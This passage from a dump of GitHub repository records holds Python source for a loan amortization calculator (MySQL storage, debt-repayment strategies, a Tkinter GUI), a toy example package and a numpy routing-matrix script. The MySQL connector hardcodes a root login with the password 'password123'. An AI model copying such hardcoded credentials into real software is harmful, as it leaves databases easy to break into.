"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2559,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 79,
"path": "/db_connection.py",
"repo_name": "TurbulentRice/loan-amortization-calculator",
"src_encoding": "UTF-8",
"text": "import mysql.connector as mySQL\nfrom loan import *\n\n# Context Manager for Cursor\nclass Cursor:\n def __init__(self, connection_: mySQL.MySQLConnection):\n self.temp_cursor = connection_.cursor()\n\n def __enter__(self):\n return self.temp_cursor\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.temp_cursor.close()\n\n# Class for loan_calc_db connection\n# Uses MySQLConnection object\n# To Do: Include imports in init, error handling wihtin object creation?\nclass LoanDBConnector:\n def __init__(self):\n self.config = {\n \"host\": \"localhost\",\n \"user\": \"root\",\n \"passwd\": \"password123\",\n \"database\": \"loan_calc_db\"\n }\n\n # We'll use the MySQLConnection object, so that the connection itself can be passed\n self.connection = mySQL.MySQLConnection(**self.config)\n\n # Put loan object info into db\n def add_loan_to_db(self, loan_obj: StandardLoan):\n insert = \"INSERT INTO loans (title, start_bal, int_rate, payment_amount) VALUES (%s, %s, %s, %s)\"\n values = (loan_obj.title, loan_obj.start_balance, loan_obj.int_rate, loan_obj.payment_amt)\n\n with Cursor(self.connection) as c:\n c.execute(insert, values)\n self.connection.commit()\n\n # Compare loan object payment history with payment history in db associated with loan obj\n # Update payment history in db\n def add_payment_to_history(self, loan_obj: StandardLoan):\n insert = \"INSERT INTO payment_history (title, start_bal, int_rate) VALUES (%s, %s, %s)\"\n pass\n\n # Select loans with NAME in them, return name and IDs for display in infobox\n def load_loan(self):\n pass\n\n def remove_loan(self, id_no):\n pass\n\n def wipe_db(self):\n with Cursor(self.connection) as c:\n c.execute(\"\"\"SET FOREIGN_KEY_CHECKS = 0;\n TRUNCATE loans;\n TRUNCATE payment_history;\n SET FOREIGN_KEY_CHECKS = 1;\n \"\"\", multi=\"TRUE\")\n\n print(\"DB Wiped\")\n\n def get_loans(self):\n with Cursor(self.connection) as c:\n c.execute(\"SELECT * FROM loans\")\n _list = [entry for entry in c]\n return _list\n\n # Return payment history dict for specified loan\n def get_history_for(self, id):\n pass\n\n def show_tables(self):\n with Cursor(self.connection) as c:\n c.execute(\"SHOW TABLES\")\n for table in c:\n print(table)\n\n def close_connection(self):\n self.connection.close()\n\n\n\n"
},
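The cursor-as-context-manager idea above can also be expressed with `contextlib`, which guarantees the cursor closes even when a query raises. A minimal sketch; the connection parameters are placeholders, not the repo's real config:

```python
# Generator-based equivalent of the Cursor class above.
from contextlib import contextmanager
import mysql.connector as mySQL

@contextmanager
def cursor(conn):
    cur = conn.cursor()
    try:
        yield cur
    finally:
        cur.close()   # runs on success and on exception

# Usage (assumes a reachable MySQL server; credentials are illustrative):
# conn = mySQL.connect(host="localhost", user="root",
#                      passwd="...", database="loan_calc_db")
# with cursor(conn) as c:
#     c.execute("SELECT * FROM loans")
#     print(c.fetchall())
```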
{
"alpha_fraction": 0.5143648982048035,
"alphanum_fraction": 0.5155410170555115,
"avg_line_length": 34.85240936279297,
"blob_id": "ae0c8208893866d6d4c994cab569516cd16ab528",
"content_id": "35e2b22edb1afba950e667775b947cc21fe28073",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11904,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 332,
"path": "/priority_queue.py",
"repo_name": "TurbulentRice/loan-amortization-calculator",
"src_encoding": "UTF-8",
"text": "# Data structures for ordering Loans and testing repayment methods\n# Receives list of StandardLoans and a monthly budget\n\nfrom loan import *\n\n\n\n#########################################\n# LOAN PRIORITY QUEUE\n#########################################\n\nclass PriorityQueue:\n def __init__(self, loans: list, budget, title=None):\n\n # Primary attributes\n self.title = title\n self.Q = loans\n self.budget = budget\n\n ##################################\n # PRIMARY GETTER / SETTERS\n ##################################\n # Title\n @property\n def title(self):\n return self._title\n @title.setter\n def title(self, t):\n if t is None:\n self._title = \"My Queue\"\n else:\n self._title = t\n # Budget\n @property\n def budget(self):\n return self._budget\n @budget.setter\n def budget(self, b):\n self._budget = Loan.Dec(b)\n\n # Length of Q\n @property\n def size(self):\n return len(self.Q)\n\n ##################################\n # EVALUATIVE METHODS\n ##################################\n def is_complete(self):\n return all([l.is_complete() for l in self.Q])\n\n def get_duration(self):\n return max([l.pay_no for l in self.Q])\n\n def get_num_payments(self):\n return sum([l.pay_no for l in self.Q])\n\n def get_principal_paid(self):\n return sum([l.get_principal_paid() for l in self.Q])\n\n def get_interest_paid(self):\n return sum([l.get_interest_paid() for l in self.Q])\n\n def get_total_paid(self):\n return sum([l.get_total_paid() for l in self.Q])\n\n def get_avg_p_to_i(self):\n return sum([l.get_p_to_i() for l in self.Q])/self.size\n\n def get_percent_principal(self):\n return Loan.Dec(self.get_principal_paid() / self.get_total_paid() * 100)\n\n ##############################\n # PREPARATION METHODS\n ##############################\n # Takes one or a list of Loans to append\n def add_loan(self, new):\n if isinstance(new, list):\n for l in new:\n self.add_loan(l)\n elif isinstance(new, Loan):\n self.Q.append(new)\n else:\n raise TypeError\n\n # Return a PriorityQueue of branch loans from instance\n def branch_Queue(self, t=None):\n return PriorityQueue([l.branch() for l in self.Q], self.budget, title=t)\n\n # Order loans based on key (not neccessary for cascade or ice_slide)\n def prioritize(self, key):\n if key == 'avalanche':\n # Sort by IR\n self.Q.sort(key=lambda loan: (loan.int_rate, loan.current_bal))\n elif key == 'blizzard':\n # Sorty by monthly interest cost\n self.Q.sort(key=lambda loan: (loan.get_int_due()))\n elif key == 'snowball':\n # Sort by descending balance\n self.Q.sort(key=lambda loan: (loan.current_bal), reverse=True)\n\n # Set payment amounts in each loan based on key\n # Return remainder of budget after min satisfied\n def set_all_payments(self, key):\n b = self.budget\n for loan in self.Q:\n if key == 'int':\n loan.payment_amt = loan.get_int_due()\n if key == 'min':\n loan.payment_amt = loan.min_payment\n elif key == 'avg':\n loan.payment_amt = (self.budget / self.size)\n b -= loan.payment_amt\n\n # Handle payments not covering minimum by raising error for now\n if b < 0:\n print(\"Budget cannot cover payments.\")\n raise ValueError\n return b\n\n def distribute(self, key, r):\n # Spread-style distribution\n if key == 'cascade' or key == 'ice_slide':\n self.spread(key, r)\n # Target-style distribution\n else:\n self.Q[-1].payment_amt += r\n\n def spread(self, key, r):\n # Cascade spreads remainder proportional to impact on total IR\n if key == 'cascade':\n total = sum([l.int_rate for l in self.Q])\n extra = [((l.int_rate / total) * r) for l in self.Q]\n\n 
# Ice Slide spreads remainder proportional to impact on total MI\n elif key == 'ice_slide':\n total = sum([l.get_int_due() for l in self.Q])\n extra = [((l.get_int_due() / total) * r) for l in self.Q]\n\n # Distribute\n for i in range(self.size):\n self.Q[i].payment_amt += extra[i]\n\n ############################################################\n # ALGORITHM METHODS\n ############################################################\n # ORDERED: Focus on targeting a single loan each cycle,\n # paying only minimums on all except target,\n # paying one off at a time\n ############################################################\n # Avalanche: Order loans by interest rate, balance,\n # target highest ir until all paid off.\n # Consistently results in lowest interest paid\n # over course of large loans.\n def avalanche(self, minimum='min'):\n return self.debt_solve('avalanche', minimum)\n ############################################################\n # Blizzard: Order loans by monthly interest cost,\n # target most expensive until all paid off.\n # Provides some benefits for small loans,\n # and/or large budgets\n def blizzard(self, minimum='min'):\n return self.debt_solve('blizzard', minimum)\n ############################################################\n # Snowball: Order loans by balance, target loan with\n # lowest starting bal, pay until all paid off.\n # Largely motivaitonal, not cost-effective.\n def snowball(self, minimum='min'):\n return self.debt_solve('snowball', minimum)\n ############################################################\n # UNORDERED: Focus on spreading payments strategically, rather\n # than strict targeting. In the short term, these\n # methods can reduce monthly cost.\n ############################################################\n # Cascade: Unordered, distribute % of budget to each loan\n # proportional to its % contribution to total\n # interest rate of all loans.\n def cascade(self, minimum='min'):\n return self.debt_solve('cascade', minimum)\n ############################################################\n # Ice Slide: Unordered, distribute % of budget to each loan\n # proportional to its % contribution to total\n # monthly cost (minimum payments) of all loans.\n def ice_slide(self, minimum='min'):\n return self.debt_solve('ice_slide', minimum)\n ############################################################\n\n # Do all methods, return MethodCompare obj of Queues sorted by \"best\"\n def find_best(self, goal='interest', minimum='min'):\n all_complete = MethodCompare([\n self.avalanche(minimum),\n self.cascade(minimum),\n self.blizzard(minimum),\n self.ice_slide(minimum),\n self.snowball(minimum)\n ])\n all_complete.order_by(goal)\n return all_complete\n\n # Main algo driver, solve-in-place, returns completed PriorityQueue\n def debt_solve(self, key, minimum):\n # Method logic map\n order_once = (key == \"avalanche\" or key == \"snowball\")\n order_every = (key == \"blizzard\")\n\n # 1) Create tempQ(branch), completedQ(empty) structures\n temp_Queue = self.branch_Queue(t=self.title+'(branch)')\n completed_Queue = PriorityQueue([], self.budget, title=self.title+f'({key})')\n\n # Initial ordering\n if order_once:\n temp_Queue.prioritize(key)\n\n # 4) Execute method until all loans popped from temp->completed\n while temp_Queue.size > 0:\n # 3) Step through payments until at least one reaches 0\n while all([not l.is_complete() for l in temp_Queue.Q]):\n\n if order_every:\n temp_Queue.prioritize(key)\n\n # Set minimums, remainder is budget leftover (raises error if<0)\n 
remainder = temp_Queue.set_all_payments(minimum)\n\n # Distribute remainder\n temp_Queue.distribute(key, remainder)\n\n # Make one payment for each loan in temp\n for loan in temp_Queue.Q:\n loan.pay_month()\n\n # \"Pop\" paidoff loan(s) to completed queue\n paid_off = [l for l in temp_Queue.Q if l.is_complete()]\n for l in paid_off:\n completed_Queue.add_loan(l)\n temp_Queue.Q.remove(l)\n\n # After every loan completes, (when temp Queue is empty), return completed Queue\n return completed_Queue\n\n ######################\n # DISPLAY METHODS\n ######################\n @staticmethod\n def line():\n print('-' * 30)\n \n def display_info(self, expand=False, histories=False):\n self.line()\n print(f'Queue title: {self.title}')\n # If we're displaying a completed loan, show completed info\n if self.is_complete():\n print(f'Loan order: {self.Q}')\n print(f'Duration: {self.get_duration()}')\n print(f'Total number of payments: {self.get_num_payments()}')\n print(f'Total interest paid: {self.get_interest_paid()}')\n print(f'Percent towards principal: {self.get_percent_principal()}')\n # If we're displaying an incomplete loan, display initial conditions\n else:\n print(f'Budget: {self.budget}')\n for l in self.Q:\n print(f'{l}: {l.start_balance}, {l.int_rate}')\n self.line()\n if expand:\n self.expanded_info()\n if histories:\n self.history_info()\n\n # Display individual loan info\n def expanded_info(self):\n self.line()\n for l in self.Q:\n for i in l.get_payment_info():\n print(i)\n self.line()\n\n # Display individual loan histories\n def history_info(self):\n self.line()\n print(f'{self.title} Payment History')\n for l in self.Q:\n self.line()\n print(f'{l.title} history:')\n for k, v in l.Payment_History.items():\n print(k, [str(p) for p in v])\n self.line()\n\n # Serialize histories to JSON, if complete \n def save_results(self):\n def dec_def(e):\n if isinstance(e, Decimal):\n return str(e)\n raise TypeError\n\n if not self.is_complete():\n print(\"Loans are not paid off...\")\n return\n\n import json\n with open(f'{self.title}_Histories.txt', 'w') as f:\n print(\"Saving...\")\n for l in self.Q:\n json.dump({l.title: l.get_payment_info()}, f)\n json.dump(l.Payment_History, f, default=dec_def, indent=4)\n\n print(\"Saved.\")\n\n\n######################################################\n# METHOD COMPARE OBJECT\n# Container for multiple PriorityQueues\n######################################################\nclass MethodCompare:\n def __init__(self, q_list):\n\n # List of PriorityQueues\n self.grid = q_list\n\n def order_by(self, goal):\n if goal == 'interest':\n self.grid.sort(key=lambda q: q.get_interest_paid())\n elif goal == 'time':\n self.grid.sort(key=lambda q: q.get_duration())\n elif goal == 'num_p':\n self.grid.sort(key=lambda q: q.get_num_payments())\n\n def all_complete(self):\n return all([q.is_complete() for q in self.grid])\n\n def display_info(self, **kwargs):\n for q in self.grid:\n q.display_info(**kwargs)\n\n"
},
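The `spread()` method's cascade rule is just a proportional split of the leftover budget. A tiny worked sketch with plain floats (the repo uses Decimal-backed Loan objects):

```python
# Cascade: leftover budget split proportionally to each loan's share of
# the summed interest rates. Shares always total the leftover exactly.
rates = [4.41, 3.61, 6.10]
leftover = 300.0

total = sum(rates)
extra = [leftover * r / total for r in rates]

print(extra)                              # ~[93.7, 76.7, 129.6]
assert abs(sum(extra) - leftover) < 1e-9  # nothing lost, nothing invented
```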
{
"alpha_fraction": 0.554436445236206,
"alphanum_fraction": 0.5663469433784485,
"avg_line_length": 36.546546936035156,
"blob_id": "67d170a05571eea6df8f10a4f3efe158acbe1667",
"content_id": "77237daebd1940dc45824eefd1cf9543eb45946f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12510,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 333,
"path": "/view_controller.py",
"repo_name": "TurbulentRice/loan-amortization-calculator",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nfrom db_connection import *\nfrom tkinter import *\nfrom tkinter import messagebox\n\n# GUI View/Controller Class\n# Windows, graphs, infoboxes, database scroller\n# Works in concert with db_connection.py and loan.py\nclass MainWindow(Frame):\n\n def __init__(self, master=Tk(), connection=None):\n Frame.__init__(self, master)\n self.master = master\n self.my_loan = StandardLoan(0, 0, 0)\n self.loan_memory = []\n self.my_connection = connection\n self.init_window()\n\n def start(self):\n self.mainloop()\n\n ####################\n # VIEW\n ####################\n def init_window(self):\n self.master.geometry(\"600x400\")\n self.master.title(\"Loan Amortization Calculator\")\n\n self.create_labels()\n self.create_entries()\n self.create_buttons()\n\n # Create and format labels in window\n def create_labels(self):\n loan_title = Label(self.master, text=\"Loan title: \")\n bal_label = Label(self.master, text=\"Starting balance: \")\n int_label = Label(self.master, text=\"Interest rate: \")\n pymt_label = Label(self.master, text=\"Monthly payment amount: \")\n num = Label(self.master, text=\"Number of payments:\")\n new_amt = Label(self.master, text=\"New payment amount:\")\n\n # Format Labels\n loan_title.grid(row=1, column=0, sticky=W, padx=5)\n bal_label.grid(row=2, column=0, sticky=W, padx=5)\n int_label.grid(row=3, column=0, sticky=W, padx=5)\n pymt_label.grid(row=4, column=0, sticky=W, padx=5)\n new_amt.grid(row=5, column=0, sticky=W, pady=10, padx=5)\n num.grid(row=6, column=0, sticky=W, pady=10, padx=5)\n\n # Create and format entries in window\n def create_entries(self):\n self.master.title_entry = Entry(self.master)\n self.master.bal_entry = Entry(self.master)\n self.master.int_entry = Entry(self.master)\n self.master.pymt_entry = Entry(self.master)\n self.master.num_pymnts = Entry(self.master)\n self.master.new_pymnt = Entry(self.master)\n\n # Format Entries\n self.master.title_entry.grid(row=1, column=1)\n self.master.bal_entry.grid(row=2, column=1)\n self.master.int_entry.grid(row=3, column=1)\n self.master.pymt_entry.grid(row=4, column=1)\n self.master.new_pymnt.grid(row=5, column=1)\n self.master.num_pymnts.grid(row=6, column=1)\n\n # Create buttons, format, and assign commands\n def create_buttons(self):\n # Connect to DB\n connect_button = Button(self.master, text=\"Connect to DB\", command=self.connect_to_DB)\n connect_button.grid(row=1, column=2)\n\n # Disconnect from DB\n disconnect_button = Button(self.master, text=\"Disconnect\", command=self.close_DB)\n disconnect_button.grid(row=2, column=2)\n\n # Click Start\n make_loan_button = Button(self.master, text=\"Start loan\", command=self.make_loan)\n make_loan_button.grid(row=4, column=2, pady=5)\n\n # Click Update Payment\n update_button = Button(self.master, text=\"Update Payment\", command=self.update_payment)\n update_button.grid(row=5, column=2)\n\n # Click Make Payments\n pay_button = Button(self.master, text=\"Make payments\", command=self.pay_loan)\n pay_button.grid(row=6, column=2)\n\n # Click Payoff\n payoff_button = Button(self.master, text=\"Payoff\", command=self.payoff_loan)\n payoff_button.grid(row=7, column=0, sticky=W, pady=5)\n\n # Click Display\n display_button = Button(self.master, text=\"Display history\", command=self.display_info)\n display_button.grid(row=8, column=0, sticky=W, pady=5)\n\n # Unpopulate entries in window\n def clear_entries(self):\n self.master.title_entry.delete(0, \"end\")\n self.master.bal_entry.delete(0, \"end\")\n 
self.master.int_entry.delete(0, \"end\")\n self.master.pymt_entry.delete(0, \"end\")\n self.master.new_pymnt.delete(0, \"end\")\n self.master.num_pymnts.delete(0, \"end\")\n\n\n ####################\n # CONTROL\n ####################\n\n def connect_to_DB(self):\n try:\n self.my_connection = LoanDBConnector()\n except (NameError, mySQL.InterfaceError):\n print(\"Connection failed\")\n else:\n print(\"Connection succeeded\")\n self.start_db_scroller()\n\n def close_DB(self):\n if self.my_connection is not None:\n self.my_connection.close_connection()\n print(\"Connection closed\")\n else:\n print(\"No connection to close\")\n\n # Menu to load loan object from db into my_loan\n def start_db_scroller(self):\n # Get active loan, populate fields in self.master(calc_window)\n def load_loan():\n try:\n index = l_list_box.curselection()\n selected = l_list_box.get(index)\n except TclError:\n print(\"Invalid selection\")\n else:\n\n # Save current loan in memory before opening new\n self.loan_memory.append(self.my_loan)\n\n self.my_loan = StandardLoan(\n float(selected[2]),\n float(selected[3]),\n float(selected[4]),\n title=selected[1])\n\n self.my_loan._print_payment_info()\n\n # Clear and populate entry fields\n self.clear_entries()\n self.master.title_entry.insert(0, f\"{self.my_loan.title}\")\n self.master.bal_entry.insert(0, self.my_loan.current_bal)\n self.master.int_entry.insert(0, self.my_loan.int_rate)\n self.master.pymt_entry.insert(0, self.my_loan.payment_amt)\n\n def clear_database():\n self.my_connection.wipe_db()\n\n # Initialize Window\n # Get 10 most recent loans, display db of loans in Listbox window\n l_list = self.my_connection.get_loans()\n db_scroller = Tk()\n l_list_box = Listbox(db_scroller, height=15, width=40, selectmode=\"SINGLE\")\n db_scroller.geometry(\"500x300\")\n db_scroller.title(\"Loans in database\")\n\n for i in range(len(l_list)):\n l_list_box.insert(i, l_list[i])\n\n l_list_box.pack()\n\n # Buttons\n loan_button = Button(db_scroller, text=\"Load\", command=load_loan)\n clear_db_button = Button(db_scroller, text=\"Clear\", command=clear_database)\n loan_button.pack()\n clear_db_button.pack()\n\n # Retrieve init data from fields, initialize new loan object\n def make_loan(self):\n try:\n title = str(self.master.title_entry.get())\n bal = float(self.master.bal_entry.get())\n i_rate = float(self.master.int_entry.get())\n m_payment = float(self.master.pymt_entry.get())\n except ValueError:\n messagebox.showinfo(\"Value Error\",\n \"Make sure field entries are accurate\")\n\n # Check for conneciton. 
If not, don't try to add to db\n else:\n self.my_loan = StandardLoan(bal, i_rate, m_payment, title=title)\n\n # Add loan info to DB\n if self.my_connection:\n self.my_connection.add_loan_to_db(self.my_loan)\n print(\"Loan added to database\")\n\n def update_payment(self):\n _p = self.master.new_pymnt.get()\n if self.master.new_pymnt.get() == \"\":\n return\n try:\n _p = float(self.master.new_pymnt.get())\n self.my_loan.payment_amt = _p\n self.master.pymt_entry.delete(0, \"end\")\n self.master.pymt_entry.insert(0, _p)\n except ValueError:\n messagebox.showinfo(\"Update Error\",\n \"Make sure new payment amount is entered\")\n\n def pay_loan(self):\n _n = self.master.num_pymnts.get()\n\n if self.my_loan.current_bal > 0:\n # Get new payment amount, num of payments\n try:\n self.update_payment()\n self.my_loan.pay_months(int(_n))\n\n except ValueError:\n messagebox.showinfo(\"Payment Error\",\n \"Make sure number of payments and new payment amount is entered\")\n else:\n messagebox.showinfo(\"Payment Error\",\n \"Loan is already paid off\")\n\n def payoff_loan(self):\n if self.my_loan.current_bal > 0:\n self.my_loan.payoff()\n\n # Update payment history in DB\n if self.my_loan.current_bal > 0:\n messagebox.showinfo(\"Payment Error\",\n \"Payments cannot cover interest, loan will never complete.\")\n else:\n self.display_info()\n else:\n messagebox.showinfo(\"Payment Error\",\n \"Loan is already paid off\")\n\n @staticmethod\n def client_exit(self):\n exit()\n\n\n ####################\n # PLOT\n #################### \n\n def plot_Payment_History(self):\n # Get data we need from Loan object using methods\n history = self.my_loan.Payment_History\n payments = self.my_loan.pay_no\n highest_bal = float(max(history[\"balance\"]))\n # PP yields a percentage /100\n # Convert to current y scale\n pp_over_time = [(history[\"principal\"][i+1] / (history[\"principal\"][i+1]\n + history[\"interest\"][i+1]) * 100)\n if history[\"principal\"][i+1] != 0\n else 0 for i in range(payments)]\n avg_pp = [sum(pp_over_time[0:i+1]) / (i+1) for i in range(payments)]\n\n # Balance History data\n principal_history = [sum(history[\"principal\"][0:i+1]) for i in range(payments+1)]\n interest_history = [sum(history[\"interest\"][0:i+1]) for i in range(payments+1)]\n total_history = [principal_history[i] + interest_history[i] for i in range(payments+1)]\n\n ####################################\n # Payment History Plot\n ####################################\n plt.figure(self.my_loan.title)\n\n # Balance History Plots\n # Define axes of graph based on Highest Balance and # Payments\n balance_graph = plt.subplot(3, 1, 1)\n plt.title(\"Balance History\")\n plt.ylabel(\"$\")\n plt.xlabel(\"Payment #\")\n if highest_bal >= self.my_loan.get_total_paid():\n plt.axis([0, payments, 0, highest_bal])\n else:\n plt.axis([0, payments, 0, float(self.my_loan.get_total_paid())])\n balance_graph.plot(\"balance\", data=history)\n balance_graph.plot(principal_history, label=\"total principal paid\")\n balance_graph.plot(interest_history, label=\"total interest paid\")\n balance_graph.plot(total_history, label=\"total paid\")\n plt.legend()\n\n # Monthly Plots\n monthly_graph = plt.subplot(3, 1, 2)\n plt.title(\"Payment History\")\n plt.ylabel(\"$\")\n plt.xlabel(\"Payment #\")\n\n monthly_graph.bar(history[\"pay_no\"], history[\"principal\"], label=\"Towards principal\")\n monthly_graph.bar(history[\"pay_no\"], history[\"interest\"], label=\"Towards interest\")\n plt.legend()\n\n # Principal Efficiency Plots\n # Ddd zeroes to front of 
percenetages to scale to graph\n pp_over_time.insert(0, 0)\n avg_pp.insert(0, 0)\n interest_graph = plt.subplot(3, 1, 3)\n plt.title(\"Principal Efficiency\")\n plt.ylabel(\"%\")\n plt.xlabel(\"Payment #\")\n # If percentages are 0, display so\n if sum(pp_over_time) == 0:\n plt.axis([0, payments, -1, 1])\n else:\n plt.axis([0, payments, 0, 100])\n interest_graph.plot(pp_over_time, label=\"% of payment towards principal\")\n interest_graph.plot(avg_pp, label=\"average % towards principal\")\n plt.legend()\n\n # Show\n plt.tight_layout()\n plt.show()\n\n def display_info(self):\n if self.my_loan.pay_no > 0:\n all_info = Tk()\n all_info.geometry(\"300x200\")\n all_info.title(\"Loan Information\")\n my_info = self.my_loan.get_payment_info()\n\n for i in range(len(my_info)):\n Label(all_info, text=f\"{my_info[i]}\").grid(row=i+1, column=1, sticky=W)\n\n self.plot_Payment_History()\n else:\n messagebox.showinfo(\"Display Error\",\n \"Nothing to display\")\n\n \n\n"
}
] | 7 |
yixinmao/example_python_pkg
|
https://github.com/yixinmao/example_python_pkg
|
5e4065e453a224fbc1e3b42488f53222d04c4410
|
52666537e67836b3632034a1683d721bf14869e0
|
0b4acf1e46668700027754f1067c0e7fd4e33761
|
refs/heads/master
| 2020-05-29T11:26:22.031359 | 2019-05-28T23:28:38 | 2019-05-28T23:28:38 | 189,116,947 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6843100190162659,
"alphanum_fraction": 0.6880907416343689,
"avg_line_length": 25.399999618530273,
"blob_id": "833ed2bf7ae402d3de5d52dd6498f5795b4efeff",
"content_id": "4bcdd41f5b84c0489e37b6666a3881dac60b165c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 529,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 20,
"path": "/README.md",
"repo_name": "yixinmao/example_python_pkg",
"src_encoding": "UTF-8",
"text": "# Example Package\n\n## Step 1. Install package\n\n- Go to the top-level directory of this repo (where `setup.py` is located):\n\n `cd ./`\n\n- Install package by:\n\n `pip install ./` (recommended)\n (`pip install -e ./` for editable package)\n OR\n `python setup install`\n\n**NOTE: The package will be installed under the name `ymaotest`, which is specified in `setup.py`. However, the actual package to import is `mytest`, which is the directory name.**\n\n## Step 2. Test package installation\n\n`python scripts/run_script.py`\n\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 14.333333015441895,
"blob_id": "beb424d4629cdf0a42d9174d707c428271695782",
"content_id": "2ef31d7ebe29bdad1a7a3a6a2eefb76bac906ad9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 3,
"path": "/scripts/run_script.py",
"repo_name": "yixinmao/example_python_pkg",
"src_encoding": "UTF-8",
"text": "\nfrom mytest import run\n\nrun.print_something()\n\n"
},
{
"alpha_fraction": 0.60550457239151,
"alphanum_fraction": 0.60550457239151,
"avg_line_length": 20.399999618530273,
"blob_id": "9db01d2114a17300f16416007871e1b89f0fa47c",
"content_id": "a23194be68f1e3d4353bb39c77195fb6bd504f1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 109,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 5,
"path": "/mytest/run.py",
"repo_name": "yixinmao/example_python_pkg",
"src_encoding": "UTF-8",
"text": "\n\ndef print_something():\n print(\"HAAAHAAAAAAAAHAAAAAA\")\n\nif __name__ == \"__main__\":\n print_something()\n"
}
] | 3 |
jeesaugustine/orca_demo
|
https://github.com/jeesaugustine/orca_demo
|
012dfd33ccf28252fa4a12981fcf6fe50762dee6
|
44f88655e7962f859ae9e2ab8562dbbee92b351b
|
4b75949cf69a8c7831b88ef3855a180f69f31aae
|
refs/heads/master
| 2022-11-10T22:13:50.032293 | 2020-07-08T20:51:05 | 2020-07-08T20:51:05 | 278,191,558 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.621283233165741,
"alphanum_fraction": 0.6322378516197205,
"avg_line_length": 26.385713577270508,
"blob_id": "cd93485f159c704586b8860f64266c98610c5ca6",
"content_id": "21a29c0ccc134cafc167793937e74512ae95b5f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1917,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 70,
"path": "/app/rstudio-export/full_a_maker.py",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
"text": "import os \nimport numpy as np\n\nclass AMaker:\n\tdef __init__(self, dim,a, dp):\n\t\tself.edge = int(dim[0])\n\t\tself.sd = int(dim[1])\n\t\tself.a_compressed = a\n\t\tself.full_a = []\n\t\tself.att = None\n\t\tself.attThresh = None\n\t\tself.attThreshCompliment = None\n\t\tself.data_path = dp\n\t\tself.threshold = 1\n\n\tdef uncompress(self):\n\t\tfor edge in self.a_compressed:\n\t\t\trow = [0]*self.sd\n\t\t\tif len(edge.strip()) != 0:\n\t\t\t\tfor e in edge.strip().split(','):\n\t\t\t\t\t# print(e)\n\t\t\t\t\trow[int(e)] = 1\n\t\t\tself.full_a.append(row)\n\t\tself.full_a = np.array(self.full_a)\n\n\tdef get_full_a(self):\n\t\tif len(self.full_a) == 0:\n\t\t\tself.uncompress()\n\n\tdef aat(self):\n\t\tself.get_full_a()\n\t\tself.att = np.dot(self.full_a,self.full_a.T)\n\n\tdef save_file(self):\n\t\tif self.att is None:\n\t\t\tself.aat()\n\t\tnp.savetxt(os.path.join(self.data_path, \"aat.csv\"), self.att, fmt=\"%d\",delimiter=\",\")\n\n\tdef aat_th(self, th):\n\t\tself.threshold = th\n\t\tself.attThresh = np.copy(self.att)\n\t\tself.attThreshCompliment =np.ones((self.edge, self.edge), dtype = np.int8)\n\t\tfor i in range(0, self.edge):\n\t\t\tif self.att[i,i] < self.threshold:\n\t\t\t\tself.attThresh[i,:] = 0\n\t\t\t\tself.attThresh[:,i] = 0\n\t\t\t\tself.attThreshCompliment[i,:] = 0\n\t\t\t\tself.attThreshCompliment[:,i] = 0\n\t\t\t\tself.attThreshCompliment[i,i] = 1\n\t\t\t\tself.attThresh[i,i] = self.att[i, i]\n\t\tnp.savetxt(os.path.join(self.data_path, \"aatThresh.csv\"), self.attThresh, fmt=\"%d\",delimiter=\",\")\n\t\tnp.savetxt(os.path.join(self.data_path, \"aatThreshCompliment.csv\"), self.attThreshCompliment, fmt=\"%d\",delimiter=\",\")\n\n\ndef get_path():\n\t\n\tpath = os.getcwd()\n\tdata_path = os.path.join(path, \"data\")\n\treturn path, data_path\n\t\nif __name__ == \"__main__\":\n\tpath, data_path = get_path()\n\ta = None\n\twith open(os.path.join(data_path, \"a.txt\"), \"rb\") as f:\n\t\ta = f.readlines()\n\t# print(type(a), a[0])\n\tamaker = AMaker(a[0].strip().split(','), a[1:], data_path)\n\tamaker.save_file()\n\tprint(int(amaker.sd/10))\n\tamaker.aat_th(int(amaker.sd/10))\n"
},
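The compressed format consumed above stores, for each edge (one row), the comma-separated indices of the source-destination pairs whose path crosses it; AMaker expands that to a dense 0/1 routing matrix and forms A·Aᵀ. A tiny worked sketch with made-up values:

```python
# Row i lists the s-d pair indices using edge i. Expanding gives the
# binary routing matrix A; the diagonal of A @ A.T counts how many s-d
# pairs ride each edge, which is what aat_th() thresholds on.
import numpy as np

compressed = ["0,2", "1", "0,1,2"]   # 3 edges, 3 s-d pairs
n_pairs = 3

A = np.zeros((len(compressed), n_pairs), dtype=int)
for i, row in enumerate(compressed):
    if row.strip():
        for j in row.split(','):
            A[i, int(j)] = 1

print(A)
print(A @ A.T)   # diagonal: [2, 1, 3] pairs per edge
```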
{
"alpha_fraction": 0.5591549277305603,
"alphanum_fraction": 0.5863849520683289,
"avg_line_length": 24.600000381469727,
"blob_id": "dc9918afa4de60a9b08e4088a85a26c4b8f48bf8",
"content_id": "f935dbbfb6205c572a6edbb7c3392420cce8944e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2130,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 80,
"path": "/app/rstudio-export/SR/Direct.h",
"repo_name": "jeesaugustine/orca_demo",
"src_encoding": "UTF-8",
